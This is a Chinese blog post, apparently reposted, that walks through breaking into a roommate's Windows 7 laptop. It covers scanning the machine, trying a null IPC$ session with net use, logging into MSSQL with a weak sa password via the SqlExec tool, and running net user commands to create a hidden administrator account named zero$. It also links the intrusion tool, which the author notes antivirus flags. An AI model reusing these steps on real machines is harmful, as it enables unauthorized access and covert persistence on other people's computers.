MSSQL内网入侵笔记

  环境:都是Win7

  最近室友的本本老是出问题,他怀疑是黑客入侵,因为莫名多出个管理员账户(虽然没登录过),以及最近PC的内存使用率莫名上涨(本就2G。。)

  PS:虽然我不认为他这电脑有什么好东西要黑的- –

  用netstat -an查看了下他的爱机打开的端口。马丹3389啊什么的都在开着,我呵呵。。你就算是学霸也不能这样任性啊。然后把这些端口都关了,最后决定扫一下他的电脑~

  扫描

  扫描之后得到下面结果:

  [172.16.138.178]: 主机名称: "XXX-pc"

  [172.16.138.178]: 发现  "端口: 135/epmap" !!!

  [172.16.138.178]: 发现  "端口: 139/netbios-ssn" !!!

  [172.16.138.178]: 发现  "端口: 445/microsoft-ds" !!!

  [172.16.138.178]: 发现  "端口: 1433/ms-sql-s" !!!

  [172.16.138.178]: IPC NULL session connection success !!!

  [172.16.138.178]: 发现  "MSSQL account: sa/123" !!!

  ipc$空连接尝试

  空连接在开着呢,也有139/445,连上试试:

  C:UsersAdministrator>net use \172.16.138.178ipc$ "" /user:""

  命令成功完成。

  OK,可以连上,映射一下试试:

  C:UsersAdministrator>net use z: \172.16.138.178c$ "" /user:""

  发生系统错误 5。

  拒绝访问。

  好吧,权限不够,刚才扫描也没扫到管理员的弱口令,看来这个管理员权限是得不到了,换个方向吧。

  MSSQL连接

  刚刚还扫描到了MSSQL的sa权限的弱口令,啧啧,我只能说no zuo no die,一个系统只要有一个破绽,你就完了。。

  没安装MSSQL,就下载一个MSSQL简易远程连接以及操作工具——SqlExec,连接界面如下:

  ok,连接成功,我们可以执行任何cmd命令了。

  创建隐藏账户:

  net user zero$ 123 /add

  net localgroup administrators zero$ /add

  这样就获得了一个管理员权限的隐藏账户,在cmd下用net user是看不见的,除非进入控制面板下的“用户和账户”。

  这样就全部ok了,总算实现了入侵一次室友电脑的伟大目(can)标(nian),等他醒了让他把弱口令改了吧。。

  PS:第一次入侵(Web不算),记录下来留个纪念。

  附上一些资料:

  经典的ipc$入侵:http://www.xfocus.net/articles/200303/493.html

  SqlExec(报毒,可用):http://down.51cto.com/data/85369

  文章来源:http://zero4eva.blog.51cto.com/7558298/1591983

 

上一篇:安卓防火墙 PS DroidWall

下一篇:修复损坏的gz或tar.gz压缩文件之原理篇